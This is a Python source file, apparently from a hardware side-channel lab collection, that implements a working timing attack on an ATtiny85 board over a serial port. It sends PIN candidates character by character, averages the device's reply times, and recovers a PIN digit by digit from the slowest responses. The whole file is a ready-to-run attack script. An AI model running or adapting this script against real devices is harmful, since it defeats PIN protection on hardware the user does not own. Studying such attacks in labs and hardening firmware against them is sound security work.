# Hardware / SideChannel / ATtiny85_Timing_Attack / multi_digit_attack.py
# 0xRoM on 11 Feb - initial commit (4 KB)
import serial
import time
import argparse

# --- Serial link to the target board ---
SERIAL_PORT = '/dev/ttyUSB0'
BAUD_RATE = 9600

# --- Attack tuning ---
PREFIX = ""  # NOTE(review): not referenced in this file; identify_sequence builds its own prefix
ATTEMPTS = 3  # timing samples averaged per candidate message
DELAY = 0.8  # seconds slept before each character is sent and after each attempt
KEYSPACE = list("1234")  # candidate characters tried at every PIN position

# UART frame size in bits: 1 start bit + 8 data bits + 1 stop bit
BYTE_SIZE = 1 + 8 + 1

def get_response_time(serial_port, message):
    """
    Send *message* one character at a time and time the device's final reply.

    The input buffer is cleared first. Before each character the function
    sleeps ``DELAY`` seconds; after every character except the last, one
    line is read and discarded so the intermediate reply is consumed.

    After the last character, bytes are read until the end of the first
    line (which is discarded). The clock starts when the first byte of the
    following line arrives and stops once the rest of that line has been
    read. Note that this waits indefinitely if the device never answers:
    empty reads (serial timeouts) are simply retried.

    Args:
        serial_port: an open pyserial ``Serial`` (or compatible) object.
        message: the characters to send.

    Returns:
        ``(final_response, response_time)`` - the decoded, stripped final
        line and the elapsed time in seconds.
    """
    # Drop stale bytes left over from the previous attempt.
    serial_port.reset_input_buffer()

    last_index = len(message) - 1
    for i, char in enumerate(message):
        time.sleep(DELAY)
        serial_port.write(char.encode())
        if i < last_index:
            # Consume the reply to this intermediate character.
            serial_port.readline()

    # Skip the first line sent after the final character; the timer starts
    # on the first byte of the line after it.
    first_line_received = False
    while True:
        byte = serial_port.read(1)
        if not byte:
            continue  # read timed out with no data; keep waiting
        if first_line_received:
            # perf_counter is monotonic and high-resolution, unlike time.time().
            start_time = time.perf_counter()
            break
        if byte == b'\n':
            first_line_received = True

    tail = serial_port.readline()
    response_time = time.perf_counter() - start_time
    # Re-attach the byte that triggered the timer so the reply is not truncated.
    final_response = (byte + tail).decode(errors='ignore').strip()

    print(f"\rSent: {message}, Response: {final_response}, Response Time: {response_time:.4f} seconds", end='', flush=True)
    time.sleep(DELAY)
    return final_response, response_time

def calculate_average_response_time(serial_port, message):
    """
    Time *message* ATTEMPTS times and report the mean.

    Each sample comes from get_response_time; the mean is printed on the
    current console line.

    Returns:
        ``(average_time, response_times)`` where ``response_times`` holds the
        individual samples in the order they were taken.
    """
    samples = []
    for _attempt in range(ATTEMPTS):
        _, elapsed = get_response_time(serial_port, message)
        samples.append(elapsed)

    mean = sum(samples) / ATTEMPTS
    print(f"\r{message} average: {mean:.4f} seconds - ", flush=True)
    return mean, samples

def identify_sequence(serial_port, length):
    """
    Recover a *length*-character sequence one position at a time.

    For each position, every candidate in KEYSPACE is sent as the prefix
    recovered so far, then the candidate, then the candidate repeated to fill
    the remaining positions. The candidate with the largest average response
    time is appended to the prefix; on ties the earlier KEYSPACE entry wins.

    Returns:
        The recovered sequence as a string.
    """
    recovered = ""
    for position in range(length):
        winner = None
        winner_avg = float('-inf')

        for candidate in KEYSPACE:
            padding = candidate * (length - len(recovered) - 1)
            guess = recovered + candidate + padding
            print(f"Testing: {guess}", end='', flush=True)
            avg, _samples = calculate_average_response_time(serial_port, guess)
            if winner_avg < avg:
                winner, winner_avg = candidate, avg

        recovered += winner
        print(f"Best digit for position {position + 1}: {winner} (Average response time: {winner_avg:.4f} seconds)")

    return recovered

def estimate_serial_time(message_length, *, baud_rate=None, byte_size=None):
    """
    Estimate the time needed to transmit *message_length* characters.

    Each character occupies ``byte_size`` bits on the wire, so the line
    carries ``baud_rate / byte_size`` characters per second.

    Args:
        message_length: number of characters to transmit.
        baud_rate: line speed in bits per second; defaults to BAUD_RATE.
        byte_size: bits per character frame; defaults to BYTE_SIZE.

    Returns:
        Estimated transmission time in seconds.
    """
    # Resolve defaults at call time so module-level overrides are honoured.
    if baud_rate is None:
        baud_rate = BAUD_RATE
    if byte_size is None:
        byte_size = BYTE_SIZE
    chars_per_second = baud_rate / byte_size
    time_per_char = 1 / chars_per_second
    return message_length * time_per_char

def _format_duration(seconds):
    """Render *seconds* as 'Hh Mm', 'Mm Ss', or 'S.SS seconds' depending on size."""
    if seconds >= 3600:
        hours, remainder = divmod(seconds, 3600)
        return f"{int(hours)}h {int(remainder // 60)}m"
    if seconds >= 60:
        minutes, secs = divmod(seconds, 60)
        return f"{int(minutes)}m {int(secs)}s"
    return f"{seconds:.2f} seconds"

def main():
    """
    Parse the PIN length, run the timing attack over SERIAL_PORT, and report.

    Prints a banner with the attempt count and a rough runtime estimate,
    recovers the sequence with identify_sequence, then prints the result,
    the finish timestamp and the total execution time.

    Exits with an error message if the length is not positive or the serial
    port cannot be used.
    """
    parser = argparse.ArgumentParser(description="PIN length argument")
    parser.add_argument("length", type=int, help="Length of the PIN to test")
    args = parser.parse_args()
    length = args.length
    if length < 1:
        parser.error("length must be a positive integer")

    max_attempts = len(KEYSPACE) * length * ATTEMPTS
    # Every attempt sends a `length`-character message, and get_response_time
    # sleeps DELAY before each character and once more afterwards:
    # (length + 1) * DELAY per attempt. The 0.05 s is a rough allowance for
    # print overhead; the device's own reply time is not modelled.
    per_attempt = (length + 1) * DELAY + estimate_serial_time(length) + 0.05
    estimated_time = max_attempts * per_attempt

    print("########################################################")
    print(f"# Attempts: {ATTEMPTS}  -    Delay: {DELAY}            ")
    print(f"# Maximum possible attempts: {max_attempts}            ")
    print(f"# Estimated maximum time: {estimated_time:.2f} seconds ")
    print("########################################################")

    start_time = time.time()  # wall-clock time, used for the printed timestamp
    start_clock = time.monotonic()  # immune to clock adjustments, used for elapsed time
    start_timestamp = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(start_time))
    print(f"Started at {start_timestamp}")

    try:
        with serial.Serial(SERIAL_PORT, BAUD_RATE, timeout=1) as serial_port:
            print(f"Starting sequence identification on port {SERIAL_PORT} with PIN length {length}...")
            sequence = identify_sequence(serial_port, length)
            print("########################################################")
            print(f"# Identified sequence: {sequence}")
            print("########################################################")
    except serial.SerialException as err:
        raise SystemExit(f"Serial error on {SERIAL_PORT}: {err}") from err

    elapsed_time = time.monotonic() - start_clock
    end_timestamp = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(time.time()))

    print(f"\nFinished at {end_timestamp}")
    print(f"Total execution time: {_format_duration(elapsed_time)}")

# Run the attack only when executed as a script, not when imported.
if __name__ == "__main__":
    main()